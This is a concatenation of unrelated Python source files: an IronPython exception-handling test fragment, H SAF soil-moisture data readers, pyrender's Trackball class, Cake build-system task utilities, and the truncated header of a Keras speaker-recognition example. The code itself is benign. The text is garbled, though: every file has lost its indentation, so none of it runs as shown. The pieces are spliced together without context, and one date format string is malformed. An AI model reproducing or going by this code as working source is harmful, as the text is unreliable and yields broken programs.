raise ValueError(13)
except:
try:
A(13)
raise ValueError(54)
except:
A(54)
sys.exc_clear()
A(None)
A(None)
A(None)
#
def test_clear_nested_func():
def f():
try:
A(13)
raise ValueError(54)
except:
A(54)
sys.exc_clear()
A(None)
A(None) # will be restored after func returns
#
try:
raise ValueError(13)
except:
A(13)
f() # calls sys.exc_clear()
A(13) # still restored even after clear
A(13)
# Test clearing when there isn't an active exception (outside except block)
def test_clear_no_active_ex():
A(None)
sys.exc_clear()
A(None)
try:
sys.exc_clear()
A(None)
except:
pass
try:
pass
finally:
sys.exc_clear()
A(None)
A(None)
#---------------------------------------------------------------------
# With!
#---------------------------------------------------------------------
#========================================================
# With's Pep (http://www.python.org/dev/peps/pep-0343/) says the
# __exit__ can be invoked by an except block,
# but unlike a normal except, that shouldn't set sys.exc_info().
# a manager class to use 'with' statement
class ManBase():
def __enter__(self):
A(None)
pass
# exit is invoked when 'with' body exits (either via exception, branch)
def __exit__(self, t,v, tb):
A(None)
return True # swallow exception
# Simple case, no exception set.
def test_with_simple():
class M1(ManBase):
pass
with M1():
pass
# with.__exit__ doesn't see exception in exception case.
def test_with_fail():
class M2(ManBase):
# exit is invoked when 'with' body exits (either via exception, branch)
def __exit__(self, t,v, tb):
AreEqual(v[0], 15) # exception passed in as local
if is_ironpython: #http://ironpython.codeplex.com/workitem/27990
A(None) # but sys.exc_info() should not be set!!
else:
A(15)
return True # swallow exception
#
# With.__exit__ does not see current exception
with M2():
raise ValueError(15)
# call 'with' from an except block
def test_with_except_pass():
class M2(ManBase):
def __enter__(self):
A(15)
# exit is invoked when 'with' body exits (either via exception, branch)
def __exit__(self, t,v, tb):
AreEqual(v, None) #
A(15) #
return True # swallow exception
#
# With.__exit__ does not see current exception
try:
raise ValueError(15)
except:
A(15)
with M2():
A(15)
pass
A(15)
# call 'with' from an except block, do failure case
def test_with_except_fail():
class M2(ManBase):
def __enter__(self):
A(15)
# exit is invoked when 'with' body exits (either via exception, branch)
def __exit__(self, t,v, tb):
AreEqual(v[0], 34) # gets failure from With block
if is_ironpython: #http://ironpython.codeplex.com/workitem/27990
A(15) # gets failure from sys.exc_info() which is from outer except block
else:
A(34)
return True # swallow exception
#
# With.__exit__ does not see current exception
try:
raise ValueError(15)
except:
A(15)
with M2():
A(15)
raise ValueError(34)
if is_ironpython: #http://ironpython.codeplex.com/workitem/27990
A(15)
else:
A(34)
run_test(__name__)
| |
# Copyright (c) 2021, TU Wien, Department of Geodesy and Geoinformation
# All rights reserved.
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# * Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of TU Wien, Department of Geodesy and Geoinformation
# nor the names of its contributors may be used to endorse or promote
# products derived from this software without specific prior written
# permission.
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL TU WIEN DEPARTMENT OF GEODESY AND
# GEOINFORMATION BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS;
# OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
# OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF
# ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""
Readers for H SAF soil moisture products.
"""
import os
import glob
import warnings
from datetime import datetime
from collections import defaultdict
import numpy as np
try:
import pygrib
except ImportError:
warnings.warn(
'pygrib can not be imported GRIB files (H14) can not be read.')
from ascat.utils import tmp_unzip
from ascat.file_handling import ChronFiles
from ascat.read_native.bufr import BUFRReader
from ascat.eumetsat.level2 import AscatL2File
from ascat.read_native.cdr import AscatGriddedNcTs
class H08Bufr:
def __init__(self, filename):
"""
Initialize H08Bufr.
Parameters
----------
filename : str
Filename.
"""
if os.path.splitext(filename)[1] == '.gz':
self.filename = tmp_unzip(filename)
else:
self.filename = filename
def read(self):
"""
Read file.
Returns
-------
data : numpy.ndarray
H08 data.
"""
data = defaultdict(list)
with BUFRReader(self.filename) as bufr:
lons = []
ssm = []
ssm_noise = []
ssm_corr_flag = []
ssm_proc_flag = []
for i, message in enumerate(bufr.messages()):
if i == 0:
# first message is just lat, lon extent
# check if any data in bbox
# lon_min, lon_max = message[0, 2], message[0, 3]
lat_min, lat_max = message[0, 4], message[0, 5]
else:
# first 5 elements are there only once, after that,
# 4 elements are repeated till the end of the array
# these 4 are ssm, ssm_noise, ssm_corr_flag and
# ssm_proc_flag each message contains the values for
# 120 lons between lat_min and lat_max the grid spacing
# is 0.00416667 degrees
lons.append(message[:, 0])
lat_min = message[0, 1]
lat_max = message[0, 2]
ssm.append(message[:, 4::4])
ssm_noise.append(message[:, 5::4])
ssm_corr_flag.append(message[:, 6::4])
ssm_proc_flag.append(message[:, 7::4])
ssm = np.rot90(np.vstack(ssm)).astype(np.float32)
ssm_noise = np.rot90(np.vstack(ssm_noise)).astype(np.float32)
ssm_corr_flag = np.rot90(
np.vstack(ssm_corr_flag)).astype(np.float32)
ssm_proc_flag = np.rot90(
np.vstack(ssm_proc_flag)).astype(np.float32)
lats_dim = np.linspace(lat_max, lat_min, ssm.shape[0])
lons_dim = np.concatenate(lons)
data = {'ssm': ssm, 'ssm_noise': ssm_noise,
'proc_flag': ssm_proc_flag, 'corr_flag': ssm_corr_flag}
# if there are is a gap in the image it is not a 2D array in
# lon, lat space but has a jump in latitude or longitude
# detect a jump in lon or lat spacing
lon_jump_ind = np.where(np.diff(lons_dim) > 0.00418)[0]
if lon_jump_ind.size > 1:
print("More than one jump in longitude")
if lon_jump_ind.size == 1:
lon_jump_ind = lon_jump_ind[0]
diff_lon_jump = np.abs(
lons_dim[lon_jump_ind] - lons_dim[lon_jump_ind + 1])
missing_elements = int(np.round(diff_lon_jump / 0.00416666))
missing_lons = np.linspace(lons_dim[lon_jump_ind],
lons_dim[lon_jump_ind + 1],
missing_elements,
endpoint=False)
# fill up longitude dimension to full grid
lons_dim = np.concatenate([lons_dim[:lon_jump_ind],
missing_lons,
lons_dim[lon_jump_ind + 1:]])
# fill data with NaN values
empty = np.empty((lats_dim.shape[0], missing_elements))
empty.fill(1e38)
for key in data:
data[key] = np.concatenate(
[data[key][:, :lon_jump_ind],
empty, data[key][:, lon_jump_ind + 1:]], axis=1)
lat_jump_ind = np.where(np.diff(lats_dim) > 0.00418)[0]
if lat_jump_ind.size > 1:
print("More than one jump in latitude")
if lat_jump_ind.size == 1:
diff_lat_jump = np.abs(
lats_dim[lat_jump_ind] - lats_dim[lat_jump_ind + 1])
missing_elements = np.round(diff_lat_jump / 0.00416666)
missing_lats = np.linspace(lats_dim[lat_jump_ind],
lats_dim[lat_jump_ind + 1],
missing_elements,
endpoint=False)
# fill up longitude dimension to full grid
lats_dim = np.concatenate(
[lats_dim[:lat_jump_ind], missing_lats,
lats_dim[lat_jump_ind + 1:]])
# fill data with NaN values
empty = np.empty((missing_elements, lons_dim.shape[0]))
empty.fill(1e38)
for key in data:
data[key] = np.concatenate(
[data[key][:lat_jump_ind, :], empty,
data[key][lat_jump_ind + 1:, :]], axis=0)
data['lon'], data['lat'] = np.meshgrid(lons_dim, lats_dim)
return data
def close(self):
"""
Close file.
"""
pass
class H08BufrFileList(ChronFiles):
"""
Reads H SAF H08 data.
"""
def __init__(self, path):
"""
Initialize.
"""
fn_templ = 'h08_{date}*.buf'
sf_templ = {'month': 'h08_{date}_buf'}
super().__init__(path, H08Bufr, fn_templ, sf_templ=sf_templ)
def _fmt(self, timestamp):
"""
Definition of filename and subfolder format.
Parameters
----------
timestamp : datetime
Time stamp.
Returns
-------
fn_fmt : dict
Filename format.
sf_fmt : dict
Subfolder format.
"""
fn_read_fmt = {'date': timestamp.strftime('%Y%m%d_%H%M%S')}
sf_read_fmt = {'month': {'date': timestamp.strftime('%Y%m')}}
fn_write_fmt = None
sf_write_fmt = None
return fn_read_fmt, sf_read_fmt, fn_write_fmt, sf_write_fmt
def _parse_date(self, filename):
"""
Parse date from filename.
Parameters
----------
filename : str
Filename.
Returns
-------
date : datetime
Parsed date.
"""
return datetime.strptime(os.path.basename(filename)[4:19],
'%Y%m%d_%H%M%S')
def read_period(dt_start, dt_end, delta):
"""
Read period not implemented.
"""
raise NotImplementedError
class AscatNrtBufrFileList(ChronFiles):
"""
Class reading ASCAT NRT BUFR files.
"""
def __init__(self, root_path, product_id='*', filename_template=None,
subfolder_template=None):
"""
Initialize.
"""
if filename_template is None:
filename_template = '{product_id}_{date}*.buf'
self.product_id = product_id
super().__init__(root_path, AscatL2File, filename_template,
sf_templ=subfolder_template)
def _fmt(self, timestamp):
"""
Definition of filename and subfolder format.
Parameters
----------
timestamp : datetime
Time stamp.
Returns
-------
fn_fmt : dict
Filename format.
sf_fmt : dict
Subfolder format.
"""
fn_read_fmt = {'date': timestamp.strftime('%Y%m%d_%H%M%S'),
'product_id': self.product_id}
sf_read_fmt = None
fn_write_fmt = None
sf_write_fmt = None
return fn_read_fmt, sf_read_fmt, fn_write_fmt, sf_write_fmt
def _parse_date(self, filename):
"""
Parse date from filename.
Parameters
----------
filename : str
Filename.
Returns
-------
date : datetime
Parsed date.
"""
return datetime.strptime(os.path.basename(filename)[4:19],
'%Y%m%d%_H%M%S')
def _merge_data(self, data):
"""
Merge data.
Parameters
----------
data : list
List of array.
Returns
-------
data : numpy.ndarray
Data.
"""
return np.hstack(data)
class H14Grib:
"""
Class reading H14 soil moisture in GRIB format.
"""
def __init__(self, filename, expand_grid=True,
metadata_fields=['units', 'name']):
"""
Parameters
----------
expand_grid : boolean, optional
if set the images will be expanded to a 2D image during reading
if false the images will be returned as 1D arrays on the
reduced gaussian grid
Default: True
metadata_fields: list, optional
fields of the message to put into the metadata dictionary.
"""
self.filename = filename
self.expand_grid = expand_grid
self.metadata_fields = metadata_fields
self.pygrib1 = True
if int(pygrib.__version__[0]) > 1:
self.pygrib1 = False
def read(self, timestamp=None):
"""
Read specific image for given datetime timestamp.
Parameters
----------
timestamp : datetime.datetime
exact observation timestamp of the image that should be read
Returns
-------
data : dict
dictionary of numpy arrays that hold the image data for each
variable of the dataset
"""
if self.pygrib1:
param_names = {'40': 'SM_layer1_0-7cm',
'41': 'SM_layer2_7-28cm',
'42': 'SM_layer3_28-100cm',
'43': 'SM_layer4_100-289cm'}
else:
param_names = {
'SWI1 Soil wetness index in layer 1': 'SM_layer1_0-7cm',
'SWI2 Soil wetness index in layer 2': 'SM_layer2_7-28cm',
'SWI3 Soil wetness index in layer 3': 'SM_layer3_28-100cm',
'SWI4 Soil wetness index in layer 4': 'SM_layer4_100-289cm',
'Soil wetness index in layer 1': 'SM_layer1_0-7cm',
'Soil wetness index in layer 2': 'SM_layer2_7-28cm',
'Soil wetness index in layer 3': 'SM_layer3_28-100cm',
'Soil wetness index in layer 4': 'SM_layer4_100-289cm'}
data = {}
metadata = {}
with pygrib.open(self.filename) as grb:
for i, message in enumerate(grb):
message.expand_grid(self.expand_grid)
if i == 1:
data['lat'], data['lon'] = message.latlons()
data[param_names[message['parameterName']]] = message.values
# read and store metadata
md = {}
for k in self.metadata_fields:
if message.valid_key(k):
md[k] = message[k]
metadata[param_names[message['parameterName']]] = md
return data
def close(self):
pass
class H14GribFileList(ChronFiles):
"""
Reads H SAF H08 data.
"""
def __init__(self, path):
"""
Initialize.
"""
fn_templ = 'H14_{date}.grib'
sf_templ = {'month': 'h14_{date}_grib'}
super().__init__(path, H14Grib, fn_templ, sf_templ=sf_templ)
def _fmt(self, timestamp):
"""
Definition of filename and subfolder format.
Parameters
----------
timestamp : datetime
Time stamp.
Returns
-------
fn_fmt : dict
Filename format.
sf_fmt : dict
Subfolder format.
"""
fn_read_fmt = {'date': timestamp.strftime('%Y%m%d%H')}
sf_read_fmt = {'month': {'date': timestamp.strftime('%Y%m')}}
fn_write_fmt = None
sf_write_fmt = None
return fn_read_fmt, sf_read_fmt, fn_write_fmt, sf_write_fmt
def _parse_date(self, filename):
"""
Parse date from filename.
Parameters
----------
filename : str
Filename.
Returns
-------
date : datetime
Parsed date.
"""
return datetime.strptime(os.path.basename(filename)[4:15], '%Y%m%d%H')
def read_period(dt_start, dt_end, delta):
"""
Read period not implemented.
"""
raise NotImplementedError()
class AscatSsmDataRecord(AscatGriddedNcTs):
"""
Class reading Metop ASCAT soil moisture data record.
"""
def __init__(self, cdr_path, grid_path, fn_format=None,
grid_filename='TUW_WARP5_grid_info_2_2.nc',
static_layer_path=None, **kwargs):
"""
Initialize.
Parameters
----------
cdr_path : str
Path to Climate Data Record (CDR) data set.
grid_path : str
Path to grid file.
grid_filename : str
Name of grid file.
static_layer_path : str
Path to static layer files.
Attributes
----------
grid : pygeogrids.CellGrid
Cell grid.
"""
if fn_format is None:
first_file = glob.glob(os.path.join(cdr_path, '*.nc'))
if len(first_file) == 0:
raise RuntimeError('No files found')
version = os.path.basename(first_file[0]).rsplit('_', 1)[0]
fn_format = '{:}_{{:04d}}'.format(version)
grid_filename = os.path.join(grid_path, grid_filename)
super().__init__(cdr_path, fn_format, grid_filename,
static_layer_path, **kwargs)
| |
# Copied from
# https://github.com/mmatl/pyrender/blob/master/pyrender/trackball.py
# MIT License
#
# Copyright (c) 2019 Matthew Matl
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
"""Trackball class for 3D manipulation of viewpoints.
"""
import numpy as np
from .. import transformations
class Trackball(object):
"""A trackball class for creating camera transforms from mouse movements.
"""
STATE_ROTATE = 0
STATE_PAN = 1
STATE_ROLL = 2
STATE_ZOOM = 3
def __init__(self, pose, size, scale,
target=np.array([0.0, 0.0, 0.0])):
"""Initialize a trackball with an initial camera-to-world pose
and the given parameters.
Parameters
----------
pose : [4,4]
An initial camera-to-world pose for the trackball.
size : (float, float)
The width and height of the camera image in pixels.
scale : float
The diagonal of the scene's bounding box --
used for ensuring translation motions are sufficiently
fast for differently-sized scenes.
target : (3,) float
The center of the scene in world coordinates.
The trackball will revolve around this point.
"""
self._size = np.array(size)
self._scale = float(scale)
self._pose = pose
self._n_pose = pose
self._target = target
self._n_target = target
self._state = Trackball.STATE_ROTATE
@property
def pose(self):
"""autolab_core.RigidTransform : The current camera-to-world pose.
"""
return self._n_pose
def set_state(self, state):
"""Set the state of the trackball in order to change the effect of
dragging motions.
Parameters
----------
state : int
One of Trackball.STATE_ROTATE, Trackball.STATE_PAN,
Trackball.STATE_ROLL, and Trackball.STATE_ZOOM.
"""
self._state = state
def resize(self, size):
"""Resize the window.
Parameters
----------
size : (float, float)
The new width and height of the camera image in pixels.
"""
self._size = np.array(size)
def down(self, point):
"""Record an initial mouse press at a given point.
Parameters
----------
point : (2,) int
The x and y pixel coordinates of the mouse press.
"""
self._pdown = np.array(point, dtype=np.float32)
self._pose = self._n_pose
self._target = self._n_target
def drag(self, point):
"""Update the tracball during a drag.
Parameters
----------
point : (2,) int
The current x and y pixel coordinates of the mouse during a drag.
This will compute a movement for the trackball with the relative
motion between this point and the one marked by down().
"""
point = np.array(point, dtype=np.float32)
dx, dy = point - self._pdown
mindim = 0.3 * np.min(self._size)
target = self._target
x_axis = self._pose[:3, 0].flatten()
y_axis = self._pose[:3, 1].flatten()
z_axis = self._pose[:3, 2].flatten()
eye = self._pose[:3, 3].flatten()
# Interpret drag as a rotation
if self._state == Trackball.STATE_ROTATE:
x_angle = -dx / mindim
x_rot_mat = transformations.rotation_matrix(
x_angle, y_axis, target
)
y_angle = dy / mindim
y_rot_mat = transformations.rotation_matrix(
y_angle, x_axis, target
)
self._n_pose = y_rot_mat.dot(x_rot_mat.dot(self._pose))
# Interpret drag as a roll about the camera axis
elif self._state == Trackball.STATE_ROLL:
center = self._size / 2.0
v_init = self._pdown - center
v_curr = point - center
v_init = v_init / np.linalg.norm(v_init)
v_curr = v_curr / np.linalg.norm(v_curr)
theta = (-np.arctan2(v_curr[1], v_curr[0]) +
np.arctan2(v_init[1], v_init[0]))
rot_mat = transformations.rotation_matrix(theta, z_axis, target)
self._n_pose = rot_mat.dot(self._pose)
# Interpret drag as a camera pan in view plane
elif self._state == Trackball.STATE_PAN:
dx = -dx / (5.0 * mindim) * self._scale
dy = -dy / (5.0 * mindim) * self._scale
translation = dx * x_axis + dy * y_axis
self._n_target = self._target + translation
t_tf = np.eye(4)
t_tf[:3, 3] = translation
self._n_pose = t_tf.dot(self._pose)
# Interpret drag as a zoom motion
elif self._state == Trackball.STATE_ZOOM:
radius = np.linalg.norm(eye - target)
ratio = 0.0
if dy > 0:
ratio = np.exp(abs(dy) / (0.5 * self._size[1])) - 1.0
elif dy < 0:
ratio = 1.0 - np.exp(dy / (0.5 * (self._size[1])))
translation = -np.sign(dy) * ratio * radius * z_axis
t_tf = np.eye(4)
t_tf[:3, 3] = translation
self._n_pose = t_tf.dot(self._pose)
def scroll(self, clicks):
"""Zoom using a mouse scroll wheel motion.
Parameters
----------
clicks : int
The number of clicks. Positive numbers indicate forward wheel
movement.
"""
target = self._target
ratio = 0.90
mult = 1.0
if clicks > 0:
mult = ratio**clicks
elif clicks < 0:
mult = (1.0 / ratio)**abs(clicks)
z_axis = self._n_pose[:3, 2].flatten()
eye = self._n_pose[:3, 3].flatten()
radius = np.linalg.norm(eye - target)
translation = (mult * radius - radius) * z_axis
t_tf = np.eye(4)
t_tf[:3, 3] = translation
self._n_pose = t_tf.dot(self._n_pose)
z_axis = self._pose[:3, 2].flatten()
eye = self._pose[:3, 3].flatten()
radius = np.linalg.norm(eye - target)
translation = (mult * radius - radius) * z_axis
t_tf = np.eye(4)
t_tf[:3, 3] = translation
self._pose = t_tf.dot(self._pose)
def rotate(self, azimuth, axis=None):
"""Rotate the trackball about the "Up" axis by azimuth radians.
Parameters
----------
azimuth : float
The number of radians to rotate.
"""
target = self._target
y_axis = self._n_pose[:3, 1].flatten()
if axis is not None:
y_axis = axis
x_rot_mat = transformations.rotation_matrix(azimuth, y_axis, target)
self._n_pose = x_rot_mat.dot(self._n_pose)
y_axis = self._pose[:3, 1].flatten()
if axis is not None:
y_axis = axis
x_rot_mat = transformations.rotation_matrix(azimuth, y_axis, target)
self._pose = x_rot_mat.dot(self._pose)
| |
"""Task Utilities.
@see: Cake Build System (http://sourceforge.net/projects/cake-build)
@copyright: Copyright (c) 2010 Lewis Baker, Stuart McMahon.
@license: Licensed under the MIT license.
"""
import sys
import threading
_threadPool = None
_threadPoolLock = threading.Lock()
def setThreadPool(threadPool):
"""Set the default thread pool to use for executing new tasks.
@param threadPool: The new default thread pool.
@return: The previous default thread pool. This is intially None.
"""
global _threadPool, _threadPoolLock
_threadPoolLock.acquire()
try:
oldThreadPool = _threadPool
_threadPool = threadPool
finally:
_threadPoolLock.release()
return oldThreadPool
def getDefaultThreadPool():
"""Get the current default thread pool for new tasks.
If no default thread pool exists then one will be created automatically.
"""
global _threadPool, _threadPoolLock
if _threadPool is None:
import cake.threadpool
processorCount = cake.threadpool.getProcessorCount()
_threadPoolLock.acquire()
try:
if _threadPool is None:
_threadPool = cake.threadpool.ThreadPool(numWorkers=processorCount)
finally:
_threadPoolLock.release()
return _threadPool
class TaskError(Exception):
"""An exception type raised by the L{Task} class.
"""
pass
def _makeTasks(value):
if value is None:
return []
elif isinstance(value, Task):
return [value]
else:
return list(value)
class Task(object):
"""An operation that is performed on a background thread.
"""
class State(object):
"""A class that represents the state of a L{Task}.
"""
NEW = "new"
"""The task is in an uninitialised state."""
WAITING_FOR_START = "waiting for start"
"""The task is waiting to be started."""
RUNNING = "running"
"""The task is running."""
WAITING_FOR_COMPLETE = "waiting for complete"
"""The task is waiting to complete."""
SUCCEEDED = "succeeded"
"""The task has succeeded."""
FAILED = "failed"
"""The task has failed."""
_current = threading.local()
def __init__(self, func=None):
"""Construct a task given a function.
@param func: The function this task should run.
@type func: any callable
"""
self._func = func
self._immediate = None
self._threadPool = None
self._required = False
self._parent = Task.getCurrent()
self._state = Task.State.NEW
self._lock = threading.Lock()
self._startAfterCount = 0
self._startAfterFailures = False
self._startAfterDependencies = None
self._completeAfterCount = 0
self._completeAfterFailures = False
self._completeAfterDependencies = None
self._callbacks = []
@staticmethod
def getCurrent():
"""Get the currently executing task.
@return: The currently executing Task or None if no current task.
@rtype: Task or None
"""
return getattr(Task._current, "value", None)
@property
def state(self):
"""Get the state of this task.
"""
return self._state
@property
def parent(self):
"""Get the parent of this task.
The parent task is the task that created this task.
"""
return self._parent
@property
def required(self):
"""True if this task is required to execute, False if it
has not yet been required to execute.
"""
return self._required
@property
def started(self):
"""True if this task has been started.
A task is started if start(), startAfter(), lazyStart(),
lazyStartAfter() or cancel() has been called on it.
"""
return self._state is not Task.State.NEW
@property
def completed(self):
"""True if this task has finished execution or has been cancelled.
"""
s = self._state
return s is Task.State.SUCCEEDED or s is Task.State.FAILED
@property
def succeeded(self):
"""True if this task successfully finished execution.
"""
return self._state is Task.State.SUCCEEDED
@property
def failed(self):
"""True if this task failed or was cancelled.
"""
return self._state is Task.State.FAILED
@property
def result(self):
"""If the task has completed successfully then holds the
return value of the task, otherwise raises AttributeError.
"""
if self.succeeded:
task = self
while isinstance(task._result, Task):
task = task._result
return task._result
else:
raise AttributeError("result only available on successful tasks")
def lazyStart(self, threadPool=None):
"""Start this task only if required as a dependency of another 'required' task.
A 'required' task is a task that is started eagerly using L{start()} or L{startAfter()}
or a task that is a dependency of a 'required' task.
If no other required tasks have this task as a dependency then this task will never
be executed. i.e. it is a lazy task.
"""
self._start(other=None, immediate=False, required=False, threadPool=threadPool)
def lazyStartAfter(self, other, threadPool=None):
"""Start this task only if required as a dependency of another 'required' task.
But do not start this task until the 'other' tasks have completed.
If any of the other tasks complete with failure then this task will complete
with failure without being executed.
"""
self._start(other=other, immediate=False, required=False, threadPool=threadPool)
def start(self, immediate=False, threadPool=None):
"""Start this task now.
@param immediate: If True the task is pushed ahead of any other (waiting)
tasks on the task queue.
@type immediate: bool
@param threadPool: If specified then the task will be queued up to be
executed on the specified thread-pool. If not specified then the task
will be queued for execution on the default thread-pool.
@type threadPool: L{ThreadPool} or C{None}
@raise TaskError: If this task has already been started or
cancelled.
"""
self._start(other=None, immediate=immediate, required=True, threadPool=threadPool)
def startAfter(self, other, immediate=False, threadPool=None):
"""Start this task after other tasks have completed.
This task is cancelled (transition to Task.State.FAILED state) if any of the
other tasks fail.
@param other: The task or a list of tasks to start after.
@type other: L{Task} or C{list}(L{Task})
@param immediate: If True the task is pushed ahead of any other (waiting)
tasks on the task queue.
@type immediate: bool
@param threadPool: An optional thread pool to start this task on.
If not specified then the task is queued to the default thread-pool.
@type threadPool: L{ThreadPool} or None
@raise TaskError: If this task has already been started or
cancelled.
"""
self._start(other=other, immediate=immediate, required=True, threadPool=threadPool)
def _start(self, other, immediate, required, threadPool):
immediate = bool(immediate)
required = bool(required)
otherTasks = _makeTasks(other)
if threadPool is None:
threadPool = getDefaultThreadPool()
self._lock.acquire()
try:
if self._state is not Task.State.NEW:
raise TaskError("task already started")
self._state = Task.State.WAITING_FOR_START
self._startAfterCount = len(otherTasks) + 1
self._immediate = immediate
self._threadPool = threadPool
if required:
self._required = True
else:
required = self._required
if required:
completeAfterDependencies = self._completeAfterDependencies
self._completeAfterDependencies = None
else:
self._startAfterDependencies = otherTasks
finally:
self._lock.release()
if required:
for t in otherTasks:
t._require()
t.addCallback(lambda t=t: self._startAfterCallback(t))
if completeAfterDependencies:
for t in completeAfterDependencies:
t._require()
t.addCallback(lambda t=t: self._completeAfterCallback(t))
self._startAfterCallback(self)
def _require(self):
"""Flag this task as required.
If this task was started with a call to lazyStart/lazyStartAfter()
and has not yet been required by some other Task then this will
cause this task and all of it's dependencies to become required.
"""
if self.required:
return
startAfterDependencies = None
completeAfterDependencies = None
self._lock.acquire()
try:
alreadyRequired = self.required
if not alreadyRequired:
startAfterDependencies = self._startAfterDependencies
completeAfterDependencies = self._completeAfterDependencies
self._startAfterDependencies = None
self._completeAfterDependencies = None
self._required = True
finally:
self._lock.release()
if not alreadyRequired:
if startAfterDependencies:
for t in startAfterDependencies:
t._require()
t.addCallback(lambda t=t: self._startAfterCallback(t))
if completeAfterDependencies:
for t in completeAfterDependencies:
t._require()
t.addCallback(lambda t=t: self._completeAfterCallback(t))
self._startAfterCallback(self)
def _startAfterCallback(self, task):
"""Callback that is called by each task we must start after.
"""
callbacks = None
self._lock.acquire()
try:
# If one task fails we should fail too
if task.failed:
self._startAfterFailures = True
# Wait for all other tasks to complete
self._startAfterCount -= 1
if self._startAfterCount > 0:
return
# Someone may have eg. cancelled us already
if self._state is not Task.State.WAITING_FOR_START:
return
if self._startAfterFailures:
self._state = Task.State.FAILED
callbacks = self._callbacks
self._callbacks = None
else:
self._state = Task.State.RUNNING
finally:
self._lock.release()
if callbacks is None:
# Task is ready to start executing, queue to thread-pool.
self._threadPool.queueJob(self._execute, front=self._immediate)
else:
# Task was cancelled, call callbacks now
for callback in callbacks:
callback()
def _execute(self):
"""Actually execute this task.
This should typically be run on a background thread.
"""
if self._state is not Task.State.RUNNING:
assert self._state is Task.State.FAILED, "should have been cancelled"
return
callbacks = None
try:
old = self.getCurrent()
self._current.value = self
# Don't hold onto the func after it has been executed so it can
# be garbage collected.
func = self._func
self._func = None
try:
if func is not None:
result = func()
else:
result = None
finally:
self._current.value = old
# If the result of the task was another task
# then our result will be the same as that other
# task's result. So make sure we don't complete
# before the other task does.
if isinstance(result, Task):
self.completeAfter(result)
self._lock.acquire()
try:
self._result = result
if self._state is Task.State.RUNNING:
if not self._completeAfterCount:
callbacks = self._callbacks
self._callbacks = None
if not self._completeAfterFailures:
self._state = Task.State.SUCCEEDED
else:
self._state = Task.State.FAILED
else:
self._state = Task.State.WAITING_FOR_COMPLETE
else:
assert self._state is Task.State.FAILED, "should have been cancelled"
finally:
self._lock.release()
except Exception, e:
trace = sys.exc_info()[2]
self._lock.acquire()
try:
self._exception = e
self._trace = trace
if self._state is Task.State.RUNNING:
if not self._completeAfterCount:
callbacks = self._callbacks
self._callbacks = None
self._state = Task.State.FAILED
else:
self._state = Task.State.WAITING_FOR_COMPLETE
else:
assert self._state is Task.State.FAILED, "should have been cancelled"
finally:
self._lock.release()
if callbacks:
for callback in callbacks:
callback()
def completeAfter(self, other):
"""Make sure this task doesn't complete until other tasks have completed.
@param other: The Task or list of Tasks to wait for.
@type other: L{Task} or C{list}(L{Task})
@raise TaskError: If this task has already finished executing.
"""
otherTasks = _makeTasks(other)
self._lock.acquire()
try:
if self.completed:
raise TaskError("Task function has already finished executing.")
required = self.required
if not required:
# This task not yet required
# Record it's dependencies in case it later becomes required
dependencies = self._completeAfterDependencies
if dependencies is None:
self._completeAfterDependencies = otherTasks
else:
dependencies.extend(otherTasks)
self._completeAfterCount += len(otherTasks)
finally:
self._lock.release()
if required:
# This task was already required so we'll require the new
# dependencies immediately.
for t in otherTasks:
t._require()
t.addCallback(lambda t=t: self._completeAfterCallback(t))
def _completeAfterCallback(self, task):
"""Callback that is called by each task we must complete after.
"""
callbacks = None
self._lock.acquire()
try:
self._completeAfterCount -= 1
if task.failed:
self._completeAfterFailures = True
if self._state is Task.State.WAITING_FOR_COMPLETE and self._completeAfterCount == 0:
if hasattr(self, "_result") and not self._completeAfterFailures:
self._state = Task.State.SUCCEEDED
else:
self._state = Task.State.FAILED
callbacks = self._callbacks
self._callbacks = None
finally:
self._lock.release()
if callbacks:
for callback in callbacks:
callback()
def cancel(self):
"""Cancel this task if it hasn't already started.
Completes the task, setting its state to Task.State.FAILED.
@raise TaskError: if the task has already completed.
"""
self._lock.acquire()
try:
if self.completed:
raise TaskError("Task already completed")
self._state = Task.State.FAILED
callbacks = self._callbacks
self._callbacks = None
finally:
self._lock.release()
for callback in callbacks:
callback()
def addCallback(self, callback):
"""Register a callback to be run when this task is complete.
@param callback: The callback to add.
@type callback: any callable
"""
if not self.completed:
self._lock.acquire()
try:
callbacks = self._callbacks
if callbacks is not None:
# Task is not yet complete, queue up callback to execute later.
callbacks.append(callback)
return
finally:
self._lock.release()
callback()
| |
"""
Title: Speaker Recognition
Author: [Fadi Badine](https://twitter.com/fadibadine)
Date created: 14/06/2020
